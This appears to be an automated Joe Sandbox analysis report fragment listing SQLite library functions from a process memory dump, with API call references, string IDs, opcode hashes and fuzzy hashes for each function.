                                                                                              • Instruction Fuzzy Hash: 84314C74A042498FCB10DFA9D9D0AEEBBF5FF89224F248169E818D7358D735D902CB91
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                                • Part of subcall function 61E254EB: sqlite3_log.SQLITE3 ref: 61E25519
                                                                                              • sqlite3_mutex_leave.SQLITE3 ref: 61E25968
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.848159408.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                                                              • Associated: 00000008.00000002.848155630.0000000061E00000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.848181965.0000000061E99000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.848186627.0000000061E9B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.848192015.0000000061EAE000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.848195774.0000000061EAF000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.848199606.0000000061EB2000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.848204998.0000000061EB5000.00000008.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.848208605.0000000061EB6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                                                                              Similarity
                                                                                              • API ID: sqlite3_logsqlite3_mutex_leave
                                                                                              • String ID:
                                                                                              • API String ID: 1465156292-0
                                                                                              • Opcode ID: c835b0a2f1f48912d605254764211426dc0a56ddc91766a6e7e980621e609dc1
                                                                                              • Instruction ID: b0c63f8ad6c8981f87e3f6021f7123c8364c2557ddd5e567217499be5fc74aad
                                                                                              • Opcode Fuzzy Hash: c835b0a2f1f48912d605254764211426dc0a56ddc91766a6e7e980621e609dc1
                                                                                              • Instruction Fuzzy Hash: 8C112770A0430A8BCB04CF5AD5C059AFBA5FF89364F14862EE8589B305D334E991CBD5
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                                • Part of subcall function 61E254EB: sqlite3_log.SQLITE3 ref: 61E25519
                                                                                              • sqlite3_mutex_leave.SQLITE3 ref: 61E25845
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.848159408.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                                                              • Associated: 00000008.00000002.848155630.0000000061E00000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.848181965.0000000061E99000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.848186627.0000000061E9B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.848192015.0000000061EAE000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.848195774.0000000061EAF000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.848199606.0000000061EB2000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.848204998.0000000061EB5000.00000008.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.848208605.0000000061EB6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                                                                              Similarity
                                                                                              • API ID: sqlite3_logsqlite3_mutex_leave
                                                                                              • String ID:
                                                                                              • API String ID: 1465156292-0
                                                                                              • Opcode ID: 3e104ec75d1f05427d57e8b40a828d2f2a46eb096ee85bd5892d50d792460a8c
                                                                                              • Instruction ID: e0996da50883f3bd06b68f2ece9ddc8d9ac0e3b33faec24ee35ccf468bc1930a
                                                                                              • Opcode Fuzzy Hash: 3e104ec75d1f05427d57e8b40a828d2f2a46eb096ee85bd5892d50d792460a8c
                                                                                              • Instruction Fuzzy Hash: C1017C3570060A9BCB04ABA9D9D09EDFBB4FF89364F25C169E8049B308DBB4D855CB94
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                                • Part of subcall function 61E254EB: sqlite3_log.SQLITE3 ref: 61E25519
                                                                                              • sqlite3_mutex_leave.SQLITE3 ref: 61E259E4
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.848159408.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                                                              • Associated: 00000008.00000002.848155630.0000000061E00000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.848181965.0000000061E99000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.848186627.0000000061E9B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.848192015.0000000061EAE000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.848195774.0000000061EAF000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.848199606.0000000061EB2000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.848204998.0000000061EB5000.00000008.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.848208605.0000000061EB6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                                                                              Similarity
                                                                                              • API ID: sqlite3_logsqlite3_mutex_leave
                                                                                              • String ID:
                                                                                              • API String ID: 1465156292-0
                                                                                              • Opcode ID: 986e6050ad27749a6cb0cb1f44111f146f7ca75fd7dc2c2223625e7d7e471bd7
                                                                                              • Instruction ID: 3cd8f2ae183f5c9c86376f09ae18081a3b57ab573096787a607dc1119f92b10d
                                                                                              • Opcode Fuzzy Hash: 986e6050ad27749a6cb0cb1f44111f146f7ca75fd7dc2c2223625e7d7e471bd7
                                                                                              • Instruction Fuzzy Hash: EF014B347003468BC700DF6AD580A8AFBA4FF89368F14C669D8188B305D375E991CFD0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                                • Part of subcall function 61E254EB: sqlite3_log.SQLITE3 ref: 61E25519
                                                                                              • sqlite3_mutex_leave.SQLITE3 ref: 61E258A2
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.848159408.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                                                              • Associated: 00000008.00000002.848155630.0000000061E00000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.848181965.0000000061E99000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.848186627.0000000061E9B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.848192015.0000000061EAE000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.848195774.0000000061EAF000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.848199606.0000000061EB2000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.848204998.0000000061EB5000.00000008.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.848208605.0000000061EB6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                                                                              Similarity
                                                                                              • API ID: sqlite3_logsqlite3_mutex_leave
                                                                                              • String ID:
                                                                                              • API String ID: 1465156292-0
                                                                                              • Opcode ID: a9697c151544da266bb117883734f60e90fa9259a565b897d89ff01c493d4291
                                                                                              • Instruction ID: 733b1a8a03f6054a2512c04a4fe2f15ce8012d452e94817838260a8fe352a867
                                                                                              • Opcode Fuzzy Hash: a9697c151544da266bb117883734f60e90fa9259a565b897d89ff01c493d4291
                                                                                              • Instruction Fuzzy Hash: 29F03A3970020A9B8B00DF6AD9C088EB7B9EF89264B14C065EC04DB305D230E952CF91
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                                • Part of subcall function 61E254EB: sqlite3_log.SQLITE3 ref: 61E25519
                                                                                              • sqlite3_mutex_leave.SQLITE3 ref: 61E258FB
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.848159408.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                                                              • Associated: 00000008.00000002.848155630.0000000061E00000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.848181965.0000000061E99000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.848186627.0000000061E9B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.848192015.0000000061EAE000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.848195774.0000000061EAF000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.848199606.0000000061EB2000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.848204998.0000000061EB5000.00000008.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.848208605.0000000061EB6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                                                                              Similarity
                                                                                              • API ID: sqlite3_logsqlite3_mutex_leave
                                                                                              • String ID:
                                                                                              • API String ID: 1465156292-0
                                                                                              • Opcode ID: 38e8b1723f6024e78b6e25b91f353e5386eb6a44a4fddf66ef4c565f0f5707ff
                                                                                              • Instruction ID: 19f8239dd8711a4a0acf0fd3a4fccf0221f07ecae00af97cb0da44f84c7d4ca3
                                                                                              • Opcode Fuzzy Hash: 38e8b1723f6024e78b6e25b91f353e5386eb6a44a4fddf66ef4c565f0f5707ff
                                                                                              • Instruction Fuzzy Hash: 21E0EC74B087099BCB00DF69D9C094AF7B8EF89268F24C665DC598B309E331E995CB81
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • sqlite3_bind_int64.SQLITE3 ref: 61E258D1
                                                                                                • Part of subcall function 61E25863: sqlite3_mutex_leave.SQLITE3 ref: 61E258A2
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.848159408.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                                                              • Associated: 00000008.00000002.848155630.0000000061E00000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.848181965.0000000061E99000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.848186627.0000000061E9B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.848192015.0000000061EAE000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.848195774.0000000061EAF000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.848199606.0000000061EB2000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.848204998.0000000061EB5000.00000008.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.848208605.0000000061EB6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                                                                              Similarity
                                                                                              • API ID: sqlite3_bind_int64sqlite3_mutex_leave
                                                                                              • String ID:
                                                                                              • API String ID: 3064317574-0
                                                                                              • Opcode ID: ce01ef94e47e0f3b5e3022edffbc238ed3a861089da3a055ee794e226609d537
                                                                                              • Instruction ID: 241d337363a67a0b3fa0b171ae47325cf8f6c1a49923edc43b5dee8f5f9fbea6
                                                                                              • Opcode Fuzzy Hash: ce01ef94e47e0f3b5e3022edffbc238ed3a861089da3a055ee794e226609d537
                                                                                              • Instruction Fuzzy Hash: BBD092B4909309AFCB00EF69C58544EBBE4AF88254F40C82EFC98C7310E6B4E8408F92
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.848159408.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                                                              • Associated: 00000008.00000002.848155630.0000000061E00000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.848181965.0000000061E99000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.848186627.0000000061E9B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.848192015.0000000061EAE000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.848195774.0000000061EAF000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.848199606.0000000061EB2000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.848204998.0000000061EB5000.00000008.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.848208605.0000000061EB6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: fe99dd488f8f8ad2b92952aec82dc289e8aab1b40138442d98c3cb0b9c02f0ee
                                                                                              • Instruction ID: 713113ab1f8dcbd7a2d66ba07bc89f046649da5e34a4f39ebb40b895256f4a46
                                                                                              • Opcode Fuzzy Hash: fe99dd488f8f8ad2b92952aec82dc289e8aab1b40138442d98c3cb0b9c02f0ee
                                                                                              • Instruction Fuzzy Hash: F7012875A0421D9BCF00CE4AD8916EEB7B5FB88364F64812AF91497341D235E9228BA4
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.848159408.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                                                              • Associated: 00000008.00000002.848155630.0000000061E00000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.848181965.0000000061E99000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.848186627.0000000061E9B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.848192015.0000000061EAE000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.848195774.0000000061EAF000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.848199606.0000000061EB2000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.848204998.0000000061EB5000.00000008.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.848208605.0000000061EB6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                                                                              APIs
                                                                                              • sqlite3_str_appendall.SQLITE3 ref: 61E331B7
                                                                                              • sqlite3_str_appendf.SQLITE3 ref: 61E331F5
                                                                                              • sqlite3_str_appendf.SQLITE3 ref: 61E33220
                                                                                              • sqlite3_str_append.SQLITE3 ref: 61E33380
                                                                                              • sqlite3_str_appendf.SQLITE3 ref: 61E33398
                                                                                              • sqlite3_str_append.SQLITE3 ref: 61E333D7
                                                                                              • sqlite3_str_append.SQLITE3 ref: 61E33453
                                                                                              • sqlite3_str_appendf.SQLITE3 ref: 61E33488
                                                                                              • sqlite3_str_append.SQLITE3 ref: 61E33504
                                                                                              Strings
                                                                                              Similarity
                                                                                              • API ID: sqlite3_str_appendsqlite3_str_appendf$sqlite3_str_appendall
                                                                                              • String ID: %s=?$0$<expr>$>? AND rowid<$ANY(%s)$AUTOMATIC COVERING INDEX$AUTOMATIC PARTIAL COVERING INDEX$COVERING INDEX %s$INDEX %s$PRIMARY KEY$SCAN$SEARCH$d$rowid
                                                                                              • API String ID: 3937484358-3012697695
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • sqlite3_free.SQLITE3 ref: 61E3E413
                                                                                              • sqlite3_snprintf.SQLITE3 ref: 61E3E444
                                                                                                • Part of subcall function 61E229CA: sqlite3_vsnprintf.SQLITE3 ref: 61E229EB
                                                                                              • sqlite3_free.SQLITE3 ref: 61E3E588
                                                                                              • sqlite3_free.SQLITE3 ref: 61E3E5C5
                                                                                              • sqlite3_free.SQLITE3 ref: 61E3E600
                                                                                              • sqlite3_snprintf.SQLITE3 ref: 61E3E632
                                                                                              • sqlite3_randomness.SQLITE3 ref: 61E3E64E
                                                                                              Strings
                                                                                              Similarity
                                                                                              • API ID: sqlite3_free$sqlite3_snprintf$sqlite3_randomnesssqlite3_vsnprintf
                                                                                              • String ID: etilqs_$winGetTempname1$winGetTempname2$winGetTempname3$winGetTempname4$winGetTempname5
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Strings
                                                                                              Similarity
                                                                                              • API ID: sqlite3_free$sqlite3_snprintf$sqlite3_mutex_entersqlite3_win32_is_nt
                                                                                              • String ID: \$winFullPathname1$winFullPathname2$winFullPathname3$winFullPathname4
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Strings
                                                                                              Similarity
                                                                                              • API ID: sqlite3_free$sqlite3_malloc64sqlite3_mprintf$sqlite3_snprintf$sqlite3_mutex_entersqlite3_mutex_leavesqlite3_strnicmp
                                                                                              • String ID: .$sqlite3_extension_init$te3_
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • sqlite3_stricmp.SQLITE3 ref: 61E280CE
                                                                                              • sqlite3_value_numeric_type.SQLITE3 ref: 61E280DA
                                                                                              • sqlite3_value_int.SQLITE3 ref: 61E280E7
                                                                                              • sqlite3_stricmp.SQLITE3 ref: 61E2810F
                                                                                              • sqlite3_value_numeric_type.SQLITE3 ref: 61E2811B
                                                                                              • sqlite3_value_int.SQLITE3 ref: 61E2812A
                                                                                              • sqlite3_stricmp.SQLITE3 ref: 61E2814A
                                                                                              • sqlite3_value_numeric_type.SQLITE3 ref: 61E28156
                                                                                              • sqlite3_value_int.SQLITE3 ref: 61E28165
                                                                                              • sqlite3_stricmp.SQLITE3 ref: 61E28191
                                                                                              • sqlite3_value_numeric_type.SQLITE3 ref: 61E2819D
                                                                                              • sqlite3_value_int.SQLITE3 ref: 61E281AB
                                                                                              Similarity
                                                                                              • API ID: sqlite3_stricmpsqlite3_value_intsqlite3_value_numeric_type
                                                                                              • String ID:
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Strings
                                                                                              Similarity
                                                                                              • API ID: memcmp$sqlite3_mprintf$sqlite3_malloc64$sqlite3_freesqlite3_vfs_find
                                                                                              • String ID: @$access$cache
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • sqlite3_free.SQLITE3 ref: 61E3EB13
                                                                                                • Part of subcall function 61E0A119: sqlite3_mutex_enter.SQLITE3 ref: 61E0A138
                                                                                              • sqlite3_snprintf.SQLITE3 ref: 61E3EB3F
                                                                                              • sqlite3_mutex_enter.SQLITE3 ref: 61E3EB4C
                                                                                              • sqlite3_mutex_alloc.SQLITE3 ref: 61E3EBA2
                                                                                              • sqlite3_uri_boolean.SQLITE3 ref: 61E3EBCA
                                                                                              • sqlite3_free.SQLITE3 ref: 61E3EC5F
                                                                                              • sqlite3_mutex_enter.SQLITE3 ref: 61E3EC7E
                                                                                              • sqlite3_mutex_leave.SQLITE3 ref: 61E3EECF
                                                                                              Strings
                                                                                              Similarity
                                                                                              • API ID: sqlite3_mutex_enter$sqlite3_free$sqlite3_mutex_allocsqlite3_mutex_leavesqlite3_snprintfsqlite3_uri_boolean
                                                                                              • String ID: winOpenShm$winShmMap1$winShmMap2$winShmMap3
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • sqlite3_str_append.SQLITE3 ref: 61E3208E
                                                                                              • sqlite3_str_append.SQLITE3 ref: 61E320A4
                                                                                              • sqlite3_str_append.SQLITE3 ref: 61E320E9
                                                                                              • sqlite3_str_appendf.SQLITE3 ref: 61E32113
                                                                                                • Part of subcall function 61E25B49: sqlite3_str_vappendf.SQLITE3 ref: 61E25B63
                                                                                              • sqlite3_str_append.SQLITE3 ref: 61E32176
                                                                                              • sqlite3_str_appendf.SQLITE3 ref: 61E3221C
                                                                                              • sqlite3_str_appendf.SQLITE3 ref: 61E322C4
                                                                                              • sqlite3_str_appendf.SQLITE3 ref: 61E322FC
                                                                                              • sqlite3_str_append.SQLITE3 ref: 61E32321
                                                                                              • sqlite3_str_appendf.SQLITE3 ref: 61E3235A
                                                                                              • sqlite3_str_append.SQLITE3 ref: 61E3237A
                                                                                              • sqlite3_str_reset.SQLITE3 ref: 61E32396
                                                                                              Strings
                                                                                              Similarity
                                                                                              • API ID: sqlite3_str_append$sqlite3_str_appendf$sqlite3_str_resetsqlite3_str_vappendf
                                                                                              • String ID: d
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • sqlite3_value_text.SQLITE3 ref: 61E3D373
                                                                                              • sqlite3_value_bytes.SQLITE3 ref: 61E3D37F
                                                                                              • sqlite3_db_config.SQLITE3 ref: 61E3D3B8
                                                                                              • sqlite3_value_bytes.SQLITE3 ref: 61E3D3CF
                                                                                              • sqlite3_value_blob.SQLITE3 ref: 61E3D3F5
                                                                                                • Part of subcall function 61E1BAAD: sqlite3_free.SQLITE3 ref: 61E1BB4E
                                                                                                • Part of subcall function 61E1BAAD: sqlite3_free.SQLITE3 ref: 61E1BB5B
                                                                                              • sqlite3_result_error.SQLITE3 ref: 61E3D42B
                                                                                              • sqlite3_result_error.SQLITE3 ref: 61E3D445
                                                                                              • sqlite3_mprintf.SQLITE3 ref: 61E3D474
                                                                                              • sqlite3_result_error.SQLITE3 ref: 61E3D48A
                                                                                              • sqlite3_free.SQLITE3 ref: 61E3D492
                                                                                              • sqlite3_db_config.SQLITE3 ref: 61E3D4BF
                                                                                              • sqlite3_result_blob.SQLITE3 ref: 61E3D4EC
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.848159408.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                                                              • Associated: 00000008.00000002.848155630.0000000061E00000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.848181965.0000000061E99000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.848186627.0000000061E9B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.848192015.0000000061EAE000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.848195774.0000000061EAF000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.848199606.0000000061EB2000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.848204998.0000000061EB5000.00000008.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.848208605.0000000061EB6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                                                                              Similarity
                                                                                              • API ID: sqlite3_freesqlite3_result_error$sqlite3_db_configsqlite3_value_bytes$sqlite3_mprintfsqlite3_result_blobsqlite3_value_blobsqlite3_value_text
                                                                                              • String ID: out of memory
                                                                                              • API String ID: 483519893-2599737071
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • sqlite3_str_append.SQLITE3 ref: 61E2146B
                                                                                              • sqlite3_str_append.SQLITE3 ref: 61E21488
                                                                                              • sqlite3_str_append.SQLITE3 ref: 61E214AD
                                                                                              • sqlite3_str_appendall.SQLITE3 ref: 61E214EB
                                                                                              • sqlite3_str_append.SQLITE3 ref: 61E2150E
                                                                                              • sqlite3_str_append.SQLITE3 ref: 61E21525
                                                                                              • sqlite3_str_append.SQLITE3 ref: 61E21542
                                                                                              • sqlite3_str_append.SQLITE3 ref: 61E21564
                                                                                              • sqlite3_str_append.SQLITE3 ref: 61E2157D
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.848159408.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                                                                              Similarity
                                                                                              • API ID: sqlite3_str_append$sqlite3_str_appendall
                                                                                              • String ID: (,)?$<expr>$rowid
                                                                                              • API String ID: 851024535-569625528
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.848159408.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                                                                              Similarity
                                                                                              • API ID: sqlite3_value_text$sqlite3_value_int$sqlite3_mallocsqlite3_result_error
                                                                                              • String ID:
                                                                                              • API String ID: 3802728871-0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                                • Part of subcall function 61E25429: sqlite3_log.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 61E2546D
                                                                                              • sqlite3_mutex_enter.SQLITE3 ref: 61E63F4E
                                                                                              • sqlite3_prepare_v2.SQLITE3 ref: 61E63F89
                                                                                              • sqlite3_step.SQLITE3 ref: 61E63FC0
                                                                                              • sqlite3_errmsg.SQLITE3 ref: 61E64189
                                                                                              • sqlite3_mutex_leave.SQLITE3 ref: 61E641C8
                                                                                                • Part of subcall function 61E22C1A: sqlite3_log.SQLITE3 ref: 61E22C43
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.848159408.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                                                                              Similarity
                                                                                              • API ID: sqlite3_log$sqlite3_errmsgsqlite3_mutex_entersqlite3_mutex_leavesqlite3_prepare_v2sqlite3_step
                                                                                              • String ID: d$d
                                                                                              • API String ID: 2909166478-195624457
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.848159408.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                                                                              Similarity
                                                                                              • API ID: strncmp
                                                                                              • String ID: -$-$0$]$false$null$true$}
                                                                                              • API String ID: 1114863663-1443276563
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.848159408.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                                                                              Similarity
                                                                                              • API ID: sqlite3_value_bytessqlite3_value_text$memcmpsqlite3_result_error_toobig
                                                                                              • String ID:
                                                                                              • API String ID: 3428878466-0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                                • Part of subcall function 61E0A6F0: sqlite3_free.SQLITE3 ref: 61E0A6FF
                                                                                                • Part of subcall function 61E0A6F0: sqlite3_free.SQLITE3 ref: 61E0A70A
                                                                                              • sqlite3_value_text.SQLITE3 ref: 61E3D7BB
                                                                                              • sqlite3_value_bytes.SQLITE3 ref: 61E3D7CE
                                                                                              • sqlite3_malloc64.SQLITE3 ref: 61E3D7E3
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.848159408.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                                                                              Similarity
                                                                                              • API ID: sqlite3_free$sqlite3_malloc64sqlite3_value_bytessqlite3_value_text
                                                                                              • String ID:
                                                                                              • API String ID: 3723316075-0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.848159408.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
